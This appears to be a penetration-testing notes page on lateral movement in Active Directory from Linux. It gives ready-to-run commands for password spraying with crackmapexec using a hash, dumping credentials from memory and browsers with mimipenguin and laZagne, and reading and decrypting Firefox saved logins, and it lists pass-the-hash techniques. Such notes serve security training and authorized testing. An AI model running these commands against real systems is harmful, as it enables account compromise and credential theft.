Lateral Movement in Active Directory from Linux

Index of Active Directory

Hardening and auditing Active Directory

Attacking from linux

• Enumerating Active Directory from Linux
• Attacking Active Directory from Linux
• Lateral Movement in Active Directory from Linux
• Privileges escalation in Active Directory from Linux

Attacking from Windows

• Enumerating Active Directory from Windows
• Active directory: connecting to other hosts
• Attacking Active Directory from Windows
• Privileges escalation in Active Directory from Windows

Linux in AD

• Linux in active directory

Spraying password technique in the domain with crackmapexec

# Spraying password with crackmapexec
crackmapexec smb $ip/23 -u /folder/userlist.txt -u administrator -H 88ad09182de639ccc6579eb0849751cf --local-auth --continue-on-success | grep +
# --continue-on-success:  continue spraying even after a valid password is found. Useful for spraying a single password against a large user list
# --local-auth:  if we are targetting a non-domain joined computer, we will need to use the option --local-auth. The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout.
# -H: hash

This technique, while effective, is quite noisy and is not a good choice for any assessments that require stealth.

Attacking SAM

If we have a foothold in the target machine, we can retrieve other credentials existing in the host memory:

See Attacking sam

Memory and cache: mimipenguin, lazagne and Firefox_decrypt

Many applications and processes work with credentials needed for authentication and store them either in memory or in files so that they can be reused.

mimipenguin

sudo python3 mimipenguin.py

lazagne

sudo python2.7 laZagne.py all

# And browsers:
sudo python3 laZagne.py browsers

Firefox stored credentials:

ls -l .mozilla/firefox/ | grep default 

cat .mozilla/firefox/xxxxxxxxx-xxxxxxxxxx/logins.json | jq .

The tool Firefox Decrypt is excellent for decrypting these credentials, and is updated regularly. It requires Python 3.9 to run the latest version. Otherwise, Firefox Decrypt 0.7.0 with Python 2 must be used.

git clone https://github.com/unode/firefox_decrypt.git   
cd firefox_decrypt 
python firefox_decrypt.py

Pass the Hash (PtH)

A Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication.

• Pass the Hash with Mimikatz (Windows)
• Pass the Hash with PowerShell Invoke-TheHash (Windows)
• Pass the Hash with Impacket (Linux)
• Pass the Hash with CrackMapExec (Linux)
• Pass the Hash with evil-winrm (Linux)
• Pass the Hash with RDP (Linux)
• UAC Limits Pass the Hash for Local Accounts

See Pass the Hash.

Last update: 2025-01-19
Created: December 27, 2024 22:00:41